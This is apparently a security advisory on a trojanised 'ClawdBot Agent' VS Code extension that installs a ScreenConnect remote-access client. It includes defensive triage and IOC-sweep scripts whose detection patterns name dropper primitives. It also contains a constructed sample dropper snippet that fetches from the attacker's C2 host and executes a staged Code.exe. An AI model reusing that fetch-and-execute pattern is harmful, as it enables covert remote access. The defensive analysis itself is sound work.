Fake Clawdbot VS Code Extension Deploys ScreenConnect RAT

Source: Aikido Security

On January 27, 2026, Aikido Security’s malware detection system flagged a malicious VS Code extension called “ClawdBot Agent” that is a fully functional trojan: it presents itself as a legitimate AI coding assistant while silently installing a ScreenConnect remote-access client, pointed at attacker-controlled infrastructure, on Windows machines every time VS Code starts.

The Attack Vector

The fake extension impersonates the legitimate Clawdbot AI assistant, which has gained significant popularity in the developer community. The attackers claimed the name on the VS Code marketplace before the real Clawdbot team published an official extension.

What makes this attack particularly dangerous is that the extension actually works as an AI coding assistant, integrating with seven AI providers including OpenAI, Anthropic, and Google. Because the advertised functionality is real, users have little reason to suspect anything is wrong.

Technical Analysis

The extension declares the onStartupFinished activation event, so VS Code loads and runs it automatically once the editor has finished starting, without the user opening a file or invoking a command. Its initCore() function then fetches configuration from a command-and-control (C2) server and downloads the payload.

Key technical findings:

  • Payload: Legitimate ScreenConnect (ConnectWise) remote-access software, configured to connect to attacker infrastructure at meeting.bulletmailer[.]net on port 8041
  • Backup Mechanism: Rust-based DWrite.dll provides redundant payload delivery via Dropbox, disguised as a Zoom update
  • Staging: Files dropped to %TEMP%\Lightshot directory
  • Process Camouflage: Payload runs as Code.exe, blending with legitimate VS Code processes
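The activation event and the dropper primitives above are visible in an extension's package.json and JavaScript before it ever runs, which makes installed extensions triageable statically. The following Python script is an added example written for this page; it is not code from the Aikido report or from the extension itself. The allow-list of AI-provider hosts, the set of "suspicious" Node APIs, and the sample manifest and source (built to mirror the behaviour described above, with the report's C2 host) are all constructed assumptions.

```python
"""Static triage of installed VS Code extensions (added example; constructed samples)."""
import json
import re
from pathlib import Path
from typing import Optional

# Activation events that run extension code with no user gesture at all.
AUTO_ACTIVATION = {"onStartupFinished", "*"}

# Primitives a chat-style coding assistant rarely needs but a dropper usually does.
# The labels are ours; the patterns are assumptions about what to look for.
SUSPICIOUS_APIS = {
    "child_process": r"child_process",
    "spawn": r"\bspawn\s*\(",
    "exec": r"\bexec(?:File|Sync)?\s*\(",
    "tmpdir": r"os\.tmpdir\s*\(",
    "stream-to-disk": r"\.pipe\s*\(\s*fs\.createWriteStream",
    "DWrite.dll": r"\bDWrite\.dll\b",
    "Code.exe": r"\bCode\.exe\b",
}

# Hosts an AI assistant legitimately talks to (assumption: extend per provider).
ALLOWED_HOSTS = {
    "api.openai.com",
    "api.anthropic.com",
    "generativelanguage.googleapis.com",
    "marketplace.visualstudio.com",
}
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(?::(\d+))?")


def manifest_autostarts(manifest: dict) -> bool:
    """True if package.json asks VS Code to activate the extension on startup."""
    return bool(AUTO_ACTIVATION & set(manifest.get("activationEvents", [])))


def triage_source(js: str) -> dict:
    """Suspicious API labels and non-allow-listed hosts found in one JS file."""
    apis = sorted(label for label, pat in SUSPICIOUS_APIS.items() if re.search(pat, js))
    hosts = sorted({
        f"{host}:{port}" if port else host
        for host, port in HOST_RE.findall(js)
        if host not in ALLOWED_HOSTS
    })
    return {"apis": apis, "unexpected_hosts": hosts}


def triage_extension(manifest: dict, sources: dict) -> Optional[dict]:
    """Combine manifest and source findings; None means nothing notable."""
    apis, hosts = set(), set()
    for js in sources.values():
        hit = triage_source(js)
        apis.update(hit["apis"])
        hosts.update(hit["unexpected_hosts"])
    if not apis and not hosts:
        return None
    autostart = manifest_autostarts(manifest)
    return {
        "extension": f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}",
        # Dropper primitives plus silent activation is the ClawdBot pattern.
        "severity": "high" if autostart else "medium",
        "autostart": autostart,
        "apis": sorted(apis),
        "unexpected_hosts": sorted(hosts),
    }


def scan_installed(root: Optional[Path] = None) -> list:
    """Triage every extension under ~/.vscode/extensions (or a given root)."""
    root = root or Path.home() / ".vscode" / "extensions"
    reports = []
    for manifest_path in root.glob("*/package.json"):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8", errors="ignore"))
        except (OSError, ValueError):
            continue
        ext_dir = manifest_path.parent
        sources = {
            str(js.relative_to(ext_dir)): js.read_text(encoding="utf-8", errors="ignore")
            for js in ext_dir.rglob("*.js")  # includes bundled node_modules: noisy but complete
        }
        report = triage_extension(manifest, sources)
        if report:
            reports.append(report)
    return reports


# Constructed sample (not the real extension's code): the shape the report describes.
SAMPLE_MANIFEST = {
    "name": "clawdbot-agent",
    "publisher": "example-publisher",
    "activationEvents": ["onStartupFinished"],
    "main": "./out/extension.js",
}
SAMPLE_SOURCES = {
    "out/extension.js": r"""
const cp = require("child_process"), os = require("os"), path = require("path");
async function initCore() {
  const cfg = await fetch("https://meeting.bulletmailer.net:8041/").then(r => r.json());
  const exe = path.join(os.tmpdir(), "Lightshot", "Code.exe");
  cp.execFile(exe, []);
}
const chat = (m) => fetch("https://api.openai.com/v1/chat/completions", { method: "POST" });
"""
}

if __name__ == "__main__":
    print(json.dumps(triage_extension(SAMPLE_MANIFEST, SAMPLE_SOURCES), indent=2))
    print(json.dumps(scan_installed(), indent=2))
```

Run it on a developer workstation and review anything rated "high": a startup-activated extension that talks to a host outside its provider allow-list and reaches for child_process or the temp directory deserves a manual look even if its advertised features work. Bundled or minified extensions will still match, because the regexes run over the shipped JavaScript rather than the original TypeScript.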

Quadruple Impersonation

The attackers layered several brands on top of each other so that each artifact looks like something benign:

  1. Clawdbot – Extension name
  2. VS Code – Payload executable name (Code.exe)
  3. Lightshot – Staging folder name
  4. Zoom – Dropbox payload disguise

Remediation

If you installed the “ClawdBot Agent” extension:

  • Uninstall the extension immediately from VS Code
  • Check for and remove ScreenConnect installation at C:\Program Files (x86)\ScreenConnect Client\
  • Delete %TEMP%\Lightshot folder
  • Block meeting.bulletmailer[.]net (port 8041) at your firewall and DNS resolver
  • Rotate any AI-provider API keys entered into the extension; treat every key it was given as exposed
  • Run a full antivirus scan
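As an added check for the steps above (not from the Aikido report), the following Python script turns the indicators into a sweep that can run before and after cleanup and from a central job on a fleet. It tests for the staging folder and ScreenConnect client directory, looks for an installed extension folder whose name contains "clawdbot" (an assumption: the real folder is publisher.name-version), and catches the process camouflage by flagging any Code.exe not launched from a VS Code install directory or anything running from %TEMP%\Lightshot. The VS Code install directory names and the sample process table are constructed assumptions.

```python
"""Host IOC sweep for the ClawdBot Agent / ScreenConnect intrusion (added example)."""
import csv
import io
import json
import ntpath
import os
import subprocess
from pathlib import Path

# Directory names of a genuine VS Code install; anything else launching Code.exe is suspect.
# Assumption: user-scope and machine-scope installs both end in one of these.
VSCODE_INSTALL_DIRS = {"Microsoft VS Code", "Microsoft VS Code Insiders"}


def ioc_paths(env: dict) -> list:
    """Filesystem artifacts named in the report, resolved from the environment."""
    return [
        ntpath.join(env.get("TEMP", ""), "Lightshot"),
        ntpath.join(env.get("ProgramFiles(x86)", r"C:\Program Files (x86)"), "ScreenConnect Client"),
    ]


def find_extension_dirs(env: dict) -> list:
    """Installed extension folders whose name mentions clawdbot (assumed naming)."""
    root = Path(env.get("USERPROFILE", "")) / ".vscode" / "extensions"
    if not root.is_dir():
        return []
    return sorted(str(p) for p in root.iterdir() if "clawdbot" in p.name.lower())


def is_vscode_install_path(path: str) -> bool:
    """Genuine Code.exe sits directly inside a VS Code install directory."""
    return ntpath.basename(ntpath.dirname(path or "")) in VSCODE_INSTALL_DIRS


def flag_processes(rows, temp_dir: str) -> list:
    """Code.exe outside a VS Code install, or anything running from %TEMP%\\Lightshot."""
    staging = ntpath.join(temp_dir, "Lightshot").lower()
    hits = []
    for name, path in rows:
        if name.lower() == "code.exe" and not is_vscode_install_path(path):
            hits.append((name, path))
        elif (path or "").lower().startswith(staging):
            hits.append((name, path))
    return hits


def list_processes() -> list:
    """(Name, ExecutablePath) for every process, via PowerShell's CIM cmdlets."""
    cmd = [
        "powershell", "-NoProfile", "-Command",
        "Get-CimInstance Win32_Process | Select-Object Name,ExecutablePath | ConvertTo-Csv -NoTypeInformation",
    ]
    out = subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
    return [(r["Name"], r["ExecutablePath"]) for r in csv.DictReader(io.StringIO(out))]


def sweep(env: dict, rows) -> dict:
    """One report combining file, extension and process indicators."""
    return {
        "artifacts_present": [p for p in ioc_paths(env) if os.path.exists(p)],
        "extension_dirs": find_extension_dirs(env),
        "suspicious_processes": flag_processes(rows, env.get("TEMP", "")),
    }


# Constructed sample process table: one genuine Code.exe, one camouflaged payload.
SAMPLE_PROCESSES = [
    ("Code.exe", r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe"),
    ("Code.exe", r"C:\Users\alice\AppData\Local\Temp\Lightshot\Code.exe"),
    ("explorer.exe", r"C:\Windows\explorer.exe"),
]
SAMPLE_ENV = {"TEMP": r"C:\Users\alice\AppData\Local\Temp", "ProgramFiles(x86)": r"C:\Program Files (x86)"}

if __name__ == "__main__":
    print(json.dumps(sweep(dict(os.environ), list_processes()), indent=2))
```

An empty report after remediation is the goal; a non-empty "suspicious_processes" list after uninstalling the extension means the ScreenConnect client is still running and must be stopped and removed before the API keys are rotated, otherwise the new keys can be harvested as well.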

Microsoft has since removed the malicious extension from the VS Code marketplace following Aikido’s report.
